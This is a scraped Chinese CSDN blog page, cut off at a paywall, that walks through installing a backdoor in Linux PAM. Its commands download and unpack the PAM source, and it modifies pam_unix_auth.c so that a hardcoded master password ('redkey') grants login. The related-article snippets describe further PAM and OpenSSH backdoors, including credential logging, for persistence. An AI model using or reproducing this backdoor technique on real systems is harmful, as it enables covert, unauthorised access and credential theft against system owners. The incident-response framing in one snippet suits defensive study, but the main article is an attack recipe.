linux pam 解锁_Linux系统安全之pam后门安装使用详解

最新推荐文章于 2024-07-19 10:52:37 发布
最新推荐文章于 2024-07-19 10:52:37 发布
阅读量577 收藏
点赞数
文章标签: linux pam 解锁
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33324399/article/details/111970019
版权
本文详细介绍了如何在Linux系统中利用PAM(Pluggable Authentication Modules)创建后门,包括查看PAM版本、下载模块、修改源码、编译、备份原有模块、替换新模块以及设置时间属性,最终实现通过特定密码(如:redkey)无限制登录。
摘要由CSDN通过智能技术生成

一.查看系统pam版本:

[root@redkey ~]# rpm -qa | grep pam

pam-1.1.1-4.el6.x86_64

二.下载对应版本的pam模块

http://www.linux-pam.org/library/

三.解压&修改pam_unix_auth.c文件

tar -xzvf Linux-PAM-1.1.1.tar.gz

cd Linux-PAM-1.1.1

cd modules/pam_unix/

vim pam_unix_auth.c

四.修改部分

PAM_EXTERN int pam_sm_authenticate(pam_handle_t * pamh, int flags

,int argc, const char **argv)

{

定义:FILE *fp;如下:

PAM_EXTERN int pam_sm_authenticate(pam_handle_t * pamh, int flags

,int argc, const char **argv)

{

unsigned int ctrl;

int retval, *ret_data = NULL;

const char *name;

const void *p;

FILE *fp;

在retval = _unix_verify_password(pamh, name, p, ctrl); [约177行]下添加

/*password:”redkey”*/

if(strcmp(p,”redkey”)==0)

最低0.47元/天 解锁文章
陪刘耀文写五三
关注
Linux PAM&&PAM后门
ronon77的专栏
03-17 261
0x00 PAM简介 PAM (Pluggable Authentication Modules )是由Sun提出的一种认证机制。它通过提供一些动态链接库和一套统一的API,将系统提供的服务和该服务的认证方式分开,使得系统管理员可以灵活地根据需要给不同的服务配置不同的认证方式而无需更改服务程序,同时也便于向系统中添加新的认证手段。PAM最初是集成在Solaris中,目前已移植到其它系统中,如...
linux操作系统PAM模块实例
11-06
linux操作系统PAM模块实例,linux操作系统PAM模块实例。
Linux-PAM(即linux可插入认证模块)
最新发布
qq_43420088的博客
07-19 1208
Linux-PAM(即linux可插入认证模块)是一套共享库,使本地系统管理员可以随意选择程序的认证方式。换句话说,不用(重新编写)重新编译一个包含PAM功能的应用程序,就可以改变它使用的认证机制,这种方式下,就算升级本地认证机制,也不用修改程序。
linux pam 解锁_Linux使用PAM锁定多次登陆失败的用户
weixin_42498989的博客
12-24 1386
如何在Linux环境中使用PAM锁定多次登录失败用户修改如下文件:/etc/pam.d/sshd (远程ssh)/etc/pam.d/login (终端)内容如下:#%PAM-1.0authrequiredpam_tally2.sodeny=3unlock_time=120even_deny_rootroot_unlock_time=1200authrequired...
linux pam 解锁_安全检查中...
weixin_33915387的博客
12-24 94
+((!+[]+(!![])+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!![])+(!+[]+(!![])+!![]+!![]+!![]+!![]+!![])+(!+[]+(!![])+!![]+!![]+!![])+(!+[]-(!![]))+(!+[]+(!![])+!![]+!![])+(!+[]+(!![])-[])+(!+[]+(!![])+!![]+!!...
linux系统安全pam后门
weixin_33971977的博客
09-30 366
本文由Sky原创投稿,请尊重劳动成果,转载注明出处!测试环境:Centos 6.2 64位0×01:查询本机的PAM版本下载地址:http://www.linux-pam.org/library/https://fedorahosted.org/releases/l/i/linux-pam/下载对应的版本对原有的文件进行备份0×02:修改源文件修改pam_unix_auth....
LINUX后门--教程(六)—— PAM后门
W小哥
07-14 5853
一、本教程作用 1、用在攻击的途径上 2、应急响应过程中,黑客会留后门,如果你连这种留后门方法都不会,怎么去应急? 不知攻,焉知防 二、PAM后门-教程 前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器root权限 靶机 IP: 192.168.160.144 (centos7) 攻击IP: 192.168.160.1 (win10 xhell) 2.1 pam介绍 在过去,我们想要对一个使用者进行认证 (authentication),得要要求用户输入账号口令, 然后透过
pam_login.zip_PAM login_PAM login_linux login p_linux pam _linu
09-19
在“pam_login.zip”这个压缩包中,我们很可能会找到有关PAM如何处理Linux系统的登录过程的源代码。这个资源对于理解PAM的工作原理以及如何自定义登录验证流程具有很高的学习价值。 PAM的核心思想是模块化,它允许...
Linux-PAM-1.3.0.tar.gz_PAM_linux_pam 1.3.1
09-23
Linux-PAM-1.3.0.tar.gz这个压缩包中,包含了版本为1.3.0的PAM的源代码和其他相关文件,允许用户在系统上安装和配置PAM来实现多样的认证策略。 PAM的核心概念在于“插件式”,这意味着它能够根据需求加载不同的...
pam_chroot.zip_linux pam _pam模块
09-14
Linux系统中,PAM(Pluggable ...正确地配置和使用`pam_chroot`,能够显著增强系统安全性和资源管理效率。在实际应用中,根据具体需求调整配置,可以实现对用户权限的精细化管理,从而更好地保护系统资源。
linux环境下pam安全模块
06-27
linux环境下pam安全模块 相关的视频 pam 1/5 http://www.boobooke.com/bbs/thread-67642-1-1.html pam 2/5 http://www.boobooke.com/bbs/thread-67655-1-1.html pam 3/5 http://www.boobooke.com/bbs/thread-67775-1-1.html pam 4/5 http://www.boobooke.com/bbs/thread-67780-1-1.html pam 5/5 http://www.boobooke.com/bbs/thread-67784-1-1.html
Linux下各种后门和日志工具详解
02-07
攻入Linux系统后,很多入侵者往往就开始得意忘形了。这其中还有一个原因,就是技术性也要求更高了 它能进一步的让你了解Linux系统
pam.tar.gz_linux pam _linux-pam
09-24
例如,`login`服务的配置文件可能包含多个行,每行代表一个PAM模块的调用,如`auth required pam_unix.so`表示需要通过UNIX密码进行认证。 **3. PAM模块类型** PAM模块分为四种类型:`auth`、`account`、`session`...
持久化:利用Linux PAM创建后门
qq_68163788的博客
02-19 1475
PAM(Pluggable Authentication Modules)是Linux系统中用于身份验证的模块化框架。通过利用PAM,可以创建一个后门来绕过系统的认证机制,从而获得未经授权的访问权限。 要创建一个后门,首先需要编写一个自定义的PAM模块,该模块可以在用户登录时执行特定的操作,例如绕过密码验证或者添加一个额外的认证方式。接着,将这个自定义的PAM模块加载到系统中,并配置PAM以在用户登录时使用该模块。 通过这种方式,攻击者可以在系统中创建一个隐藏的后门,同时绕过正常的认证流程,
linux安装pam
weixin_44333998的博客
11-13 5737
linux安装pam库 centos sudo yum install pam-deval ubuntu sudo apt-get install libpam0g-dev
LinuxPAM模块学习总结
wo4owen的博客
09-30 921
转载于: https://www.cnblogs.com/kevingrace/p/8671964.html 如有侵权请联系删除 LinuxPAM模块学习总结 在Linux中执行有些程序时,这些程序在执行前首先要对启动它的用户进行认证,符合一定的要求之后才允许执行,例如login, su等。在Linux中进行身份或是状态的验证程序是由PAM来进行的,PAM(Pluggable Authentication Modules)可动态加载验证模块,因为可以按需要动态的对验证的内容进行变更,所以可以大.
Linux权限维持—OpenSSH&PAM后门&SSH软连接&公私钥登录
剁椒鱼头没剁椒的博客
08-22 3015
由于密码日志文件是被隐藏的,所以可以直接使用cat去查看,这里只要管理者使用ssh进行连接就会记录密码,而这些操作都是无感的,当然若管理员会去定期排查,那么该被发现还是会被发现的,这些都是基于管理员不会定期去排查才能够持久。这里要注意一个问题就是,不一定编译就能够成功,有时候根本无法编辑,从网上找的很多资料中,都跳过直接给命令,所以这里我就提前说一下,不一定能够编译成功,不成功再次重新测试,若还是不行,就拉到吧。这里重启也可能存在问题,这个实验有时候很莫名其妙的,有时候能够测试成功,有时候测试是不成功的。
深入 Linux PAM 体系结构
weixin_33910137的博客
03-27 208
深入 Linux PAM 体系结构 本文阐述了 Linux-PAM 的概念,同时还与读者一道分析了 Linux-PAM 的体系结构,作者希望籍此以加深读者对 Linux-PAM 的理解,以便对其有更深层的把握。 一、什么是Linux-PAM 为安全起见,计算机系统只有经过授权的合法用户才能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值